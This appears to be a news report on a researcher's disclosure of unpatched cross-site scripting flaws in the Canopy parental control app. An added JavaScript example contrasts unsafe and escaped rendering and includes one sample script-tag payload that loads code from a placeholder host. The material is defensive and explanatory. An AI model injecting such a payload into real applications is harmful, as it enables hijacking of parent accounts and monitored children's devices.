The Canopy parental control app has an exhaustive list of features that allow parents to limit and monitor use of protected devices.
“When the parent logs in, the attacker would have access to the parent portal and all features a parent has for monitoring and controlling child devices. It looks like an attacker would be able to do this en masse to all customers of Canopy,” notes Young in his breakdown of the app’s flaws.
Abusing privileged access
Being a security researcher, Young was intrigued by the app’s feature list, much of which suggested that the app would have privileged access to the protected device. That privileged access could put the protected devices, and the privacy of the children using them, at risk, argues Young.
While exploring the app he found that the block page let the child request access to the blocked resource and included a text box for sending a message to the parent. Much to Young’s surprise, the input field wasn’t sanitized and accepted up to 50 characters, which he notes is enough to load a malicious external script.
His first tests were innocent examples of how a child could exploit the vulnerability to access blocked resources, and even pause monitoring protection altogether.
However, the threats arising from the vulnerability were far more serious, and Young has deliberately withheld details in his post because Canopy has not fixed all of the attack scenarios.
“I reached out to Canopy by phone and by email repeatedly. Ultimately, they produced a fix for the XSS from child to parent but failed to do anything to protect against the parent to child XSS or XSS through the URL of a blocked page request before becoming unresponsive. Canopy needs to implement sanitization of all user-input fields but has failed to do so,” claims Young.
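As an added illustration of the fix Young calls for (example code, not Canopy’s; the request field names and the `example.invalid` host are assumptions), here is the same parent-portal rendering done unsafely and then with output escaping, a server-side length limit and URL validation:

```javascript
// Added example, not Canopy's code: rendering a child's "request access"
// message in a parent-facing page. Field names and hosts are assumptions.

const MAX_MESSAGE_LENGTH = 50; // the limit the article reports for the text box

// Escape the five characters that let text break out of an HTML text node
// or attribute value. Applied at output time, so stored text is unchanged.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Accept only absolute http(s) URLs for the blocked-page request, so a value
// smuggled into the URL field cannot carry another scheme or markup.
function normalizeBlockedUrl(raw) {
  let url;
  try { url = new URL(String(raw)); } catch { return null; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.href;
}

// Vulnerable rendering: user-controlled values spliced straight into markup.
function renderRequestUnsafe(req) {
  return `<li><a href="${req.url}">${req.url}</a>: ${req.message}</li>`;
}

// Hardened rendering: length enforced server-side, URL validated, every
// user-controlled value escaped on its way into the HTML.
function renderRequestSafe(req) {
  const message = String(req.message).slice(0, MAX_MESSAGE_LENGTH);
  const url = normalizeBlockedUrl(req.url);
  if (url === null) return '<li>(request with invalid URL dropped)</li>';
  return `<li><a href="${escapeHtml(url)}">${escapeHtml(url)}</a>: ` +
         `${escapeHtml(message)}</li>`;
}

// Constructed sample submission, 49 characters, as the block page might send it.
const sampleRequest = {
  url: 'https://example.invalid/game',
  message: 'hi <script src="//example.invalid/x.js"></script>',
};
```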